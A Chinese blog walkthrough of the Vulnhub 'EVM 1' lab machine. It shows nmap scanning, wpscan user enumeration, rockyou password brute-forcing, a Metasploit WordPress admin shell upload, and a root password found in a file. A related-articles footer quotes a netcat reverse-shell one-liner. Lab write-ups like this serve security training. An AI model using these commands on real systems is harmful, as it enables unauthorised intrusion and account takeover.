首页 > 其他分享 >Vulnhub:EVM 1靶机

Vulnhub:EVM 1靶机

时间:2023-04-24 19:46:23浏览次数:39  
标签:set http EVM c0rrupt3d 192.168 wordpress Vulnhub 靶机 111.131

kali:192.168.111.111

靶机:192.168.111.131

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.131

image

使用nmap的http-enum脚本扫描出目标为wordpress站点,使用wpscan枚举目标用户,得到用户:c0rrupt3d_brain

wpscan --url http://192.168.111.131/wordpress/ -e u

image

用收集到的用户爆破密码,得到密码:24992499

wpscan --url http://192.168.111.131/wordpress/ -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt

image

使用msf的exploit/unix/webapp/wp_admin_shell_upload模块拿shell

msfdb run
use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 192.168.111.131
set username c0rrupt3d_brain
set password 24992499
set targeturi /wordpress

image

提权

在/home/root3r/.root_password_ssh.txt发现root用户的密码:willy26

image

flag

image

标签:set,http,EVM,c0rrupt3d,192.168,wordpress,Vulnhub,靶机,111.131
From: https://www.cnblogs.com/ctostm/p/17350658.html

相关文章

  • Vulnhub之 BoredHackerBlog: Social Network 2.0靶机详细测试过程
    Socnet作者:jasonhuawen靶机信息名称:BoredHackerBlog:SocialNetwork2.0地址:https://www.vulnhub.com/entry/boredhackerblog-social-network-20,455/识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]└─$sudonetdiscover-ieth1-r192.168.56.0/24Cu......
  • vulnhub靶场之ADROIT: 1.0.1
    准备:攻击机:虚拟机kali、本机win10。靶机:Adroit:1.0.1,下载地址:https://download.vulnhub.com/adroit/Adroit-v1.0.1.ova,下载后直接vbox打开即可。知识点:shell反弹(jar)、sql注入、简单的代码编写、逆向、dns解析。这个靶场比较推荐,因为之前做的大都是python、php的,这种java类的......
  • Vulnhub之Harrison靶机详细测试过程(提权成功)
    Harrison作者:jasonhuawen靶机信息名称:SP:harrison地址:https://www.vulnhub.com/entry/sp-harrison,302/识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Harrison]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|ScreenView......
  • Vulnhub之Healthcare靶机详细测试过程
    Healthcare作者:jasonhuawen靶机信息名称:地址:识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Healthcare]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts......
  • Vulnhub之HF 2019靶机详细测试过程
    HF2019作者:jasonhuawen靶机信息名称:HackerFest:2019地址:https://www.vulnhub.com/entry/hacker-fest-2019,378/识别目标主机IP地址将虚拟机镜像导入到VirtualBox中,并设置网络模式为host-only,然后启动KaliLinux以及目标主机(虚拟机):(kali㉿kali)-[~/Vulnhub/HF2019]......
  • VulnHub-Tomato: 1
    靶机地址:https://www.vulnhub.com/entry/tomato-1,557/目标:Gettherootshelli.e.(root@localhost:~#)andthenobtainflagunder/root).一、信息收集用arp-scan探测网段内目标靶机的IP,得到目标靶机的IP为192.168.11.137arp-scan-l┌──(root㉿kali)-[~]└─#......
  • VulnHub-DC: 2
    靶机地址:https://www.vulnhub.com/entry/dc-2,311/目标:therearefiveflagsincludingthefinalflag.theonlyflagthatreallycounts,isthefinalflag.主机信息Kali:192.168.11.131DC9:192.168.11.138渗透过程1、主机探测先进行主机探测,查找靶机的IP地址a......
  • vulnhub_Earth_WP
    前言靶机地址->>>vulnhub_Earth攻击机ip:192.168.20.121靶机ip:192.168.20.122参考文章https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.htmlhttps://www.cnblogs.com/wthuskyblog/p/16032277.htmlhttps://www.cnblogs.com/CHOSEN1-Z13/p/15915195.html探测靶......
  • Vulnhub之Inclusiveness靶机详细测试过程
    Inclusiveness识别目标主机IP地址─(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts......
  • Vulnhub:Misdirection 1靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.1308080端口/debug目录,是一个可以执行命令的shell获得反弹shellrm/tmp/f;mkfifo/tmp/f;cat/tmp/f|sh-i2>&1|nc192.168.111.1114444>/tmp/f提......